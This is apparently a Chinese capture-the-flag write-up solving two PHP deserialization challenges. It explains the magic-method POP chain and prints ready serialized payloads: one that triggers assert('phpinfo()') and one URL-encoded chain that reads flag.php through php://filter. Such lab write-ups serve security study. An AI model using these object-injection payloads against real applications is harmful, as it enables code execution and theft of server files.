题目2
观察分析,前端存在一个源码地址:
http://43a74fcb-44ed-4018-8e2e-b08daae329b0.node4.buuoj.cn:81/time.php?source
访问得源码
本地构造序列化:O:8:"HelloPhp":2:{s:1:"a";s:9:"phpinfo()";s:1:"b";s:6:"assert";}
获得flag
题目3
访问页面,给出index.php的源码
魔术方法知识点:
(1)__get():当程序调用一个未定义或不可见的成员变量时触发;
(2)__toString(): 把类当作字符串使用时触发;
(3)__invoke():当程序尝试将对象调用为函数时触发;
(4)__wakeup():使用unserialize时触发;
代码分析:
核心思路构造pop反序列化获得flag
1、pop作为show类的一个对象,会有两个参数:source和str;
2、构造函数__construct 会进行 echo $this->source,要触发__toString()函数,则可以将source参数作为一个类的对象;
3、pop为show类时,先进入_wakeup方法,进行了过滤;
代码分析:
1、假设将pop对象的参数source设置为Show类(此时source对象也拥有两个参数:source和str),则会触发__toString()函数,return source对象的str参数的source;
2此时str如果是Test类的一个对象,则没有source参数,执行__toString()函数则会找不到source参数,就会调用Test类对象str的__get()函数
1、__get()函数调用p参数对应的函数 注意:$function(), 如果$function是个对象,那么则会调用__invoke()函数;
2、所以可以将参数p设置为Modifier类的对象,从而执行__invoke()函数,进而执行append函数;
3、所以可以将var参数设置为php://filter/read=convert.base64-encode/resource=flag.php用来读取flag;
Payload构造:
生成payload:O%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3BO%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3BN%3Bs%3A3%3A%22str%22%3BO%3A4%3A%22Test%22%3A1%3A%7Bs%3A1%3A%22p%22%3BO%3A8%3A%22Modifier%22%3A1%3A%7Bs%3A6%3A%22%00%2A%00var%22%3Bs%3A57%3A%22php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3Dflag.php%22%3B%7D%7D%7Ds%3A3%3A%22str%22%3BN%3B%7D
成功读取flag.php
Base64解码获得flag